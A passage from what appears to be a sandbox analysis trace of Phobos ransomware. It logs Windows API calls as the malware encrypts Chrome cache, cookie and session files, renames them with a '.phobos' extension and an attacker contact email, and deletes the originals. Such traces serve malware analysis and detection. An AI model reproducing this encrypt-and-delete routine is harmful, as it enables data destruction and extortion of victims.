dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.357] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.357] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.358] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0184.358] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.358] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x42d0, lpOverlapped=0x0) returned 1 [0184.578] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x42e0, dwBufLen=0x42e0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x42e0) returned 1 [0184.578] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x42e0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x42e0, lpOverlapped=0x0) returned 1 [0184.579] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0184.579] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.579] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0184.579] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0184.579] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0184.579] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.579] CloseHandle (hObject=0x134) returned 1 [0184.579] CloseHandle (hObject=0x178) returned 1 [0184.579] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms")) returned 1 [0184.580] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.580] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_2"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.580] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=8192) returned 1 [0184.580] CloseHandle (hObject=0x178) returned 1 [0184.580] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_2")) returned 0x2020 [0184.580] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_2.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.580] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.581] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.581] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.581] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_2.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.581] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0184.581] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.581] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x2000, lpOverlapped=0x0) returned 1 [0184.639] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2010, dwBufLen=0x2010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2010) returned 1 [0184.639] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x2010, lpOverlapped=0x0) returned 1 [0184.641] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0184.641] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.641] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0184.641] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0184.641] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0184.641] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.641] CloseHandle (hObject=0x178) returned 1 [0184.641] CloseHandle (hObject=0x134) returned 1 [0184.641] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_2")) returned 1 [0184.642] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.642] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\index"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.643] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=524656) returned 1 [0184.643] CloseHandle (hObject=0x134) returned 1 [0184.643] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\index")) returned 0x2020 [0184.643] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\index.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.643] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\index"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.643] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.643] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.643] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\index.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.643] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0184.643] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.643] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x80170, lpOverlapped=0x0) returned 1 [0184.771] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x80180, dwBufLen=0x80180 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x80180) returned 1 [0184.775] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x80180, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x80180, lpOverlapped=0x0) returned 1 [0184.783] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32aa8) returned 1 [0184.783] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.783] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0184.783] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.783] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0184.784] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.784] CloseHandle (hObject=0x134) returned 1 [0184.784] CloseHandle (hObject=0x178) returned 1 [0184.784] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\index")) returned 1 [0184.789] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.789] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.790] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=7168) returned 1 [0184.790] CloseHandle (hObject=0x178) returned 1 [0184.790] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies")) returned 0x2020 [0184.790] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.790] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.790] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.791] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0184.791] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.791] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1c00, lpOverlapped=0x0) returned 1 [0184.792] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1c10, dwBufLen=0x1c10 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1c10) returned 1 [0184.792] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1c10, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1c10, lpOverlapped=0x0) returned 1 [0184.793] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32aa8) returned 1 [0184.793] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.793] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0184.793] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.793] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0184.794] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.794] CloseHandle (hObject=0x178) returned 1 [0184.794] CloseHandle (hObject=0x134) returned 1 [0184.794] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies")) returned 1 [0184.795] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies-journal"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.795] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0184.795] CloseHandle (hObject=0x134) returned 1 [0184.795] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current session"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.796] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=470) returned 1 [0184.796] CloseHandle (hObject=0x134) returned 1 [0184.796] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current session")) returned 0x2020 [0184.796] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current session.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.796] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current session"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.796] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.796] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.796] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current session.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.797] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0184.797] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.797] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1d6, lpOverlapped=0x0) returned 1 [0184.798] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1e0) returned 1 [0184.798] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1e0, lpOverlapped=0x0) returned 1 [0184.799] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32aa8) returned 1 [0184.799] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.799] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0184.799] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.799] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0184.799] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.799] CloseHandle (hObject=0x134) returned 1 [0184.799] CloseHandle (hObject=0x178) returned 1 [0184.799] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current session")) returned 1 [0184.800] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current tabs"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.800] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=294) returned 1 [0184.800] CloseHandle (hObject=0x178) returned 1 [0184.800] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current tabs")) returned 0x2020 [0184.800] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current tabs.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current tabs"), 